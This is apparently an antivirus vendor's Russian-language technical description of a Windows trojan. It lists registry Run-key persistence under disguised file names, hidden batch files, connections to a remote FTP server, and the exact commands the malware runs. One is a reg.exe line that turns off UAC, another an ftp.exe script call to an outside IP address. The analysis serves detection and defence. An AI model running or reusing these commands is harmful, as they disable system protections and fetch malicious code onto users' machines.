Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userinite' = '%WINDIR%\system\drivers\svchot.exe -s'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userini' = '%WINDIR%\system\drivers\userprofile.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userinit' = '%WINDIR%\system\setup.exe'
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
Запускает на исполнение:
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\inf\13438.txt 185.13.227.163
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\find.exe' /i "TTL="
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\inf\security.cmd" "
- '<SYSTEM32>\ping.exe' www.google.com
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\inf\security.cmd
- %WINDIR%\inf\13438.txt
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
Присваивает атрибут 'скрытый' для следующих файлов:
- %WINDIR%\inf\security.cmd
Удаляет следующие файлы:
- %WINDIR%\inf\13438.txt
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
Сетевая активность:
Подключается к:
- 'localhost':1038
- '18#.#3.227.163':21
UDP:
- DNS ASK www.google.com
Другое:
Ищет следующие окна:
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
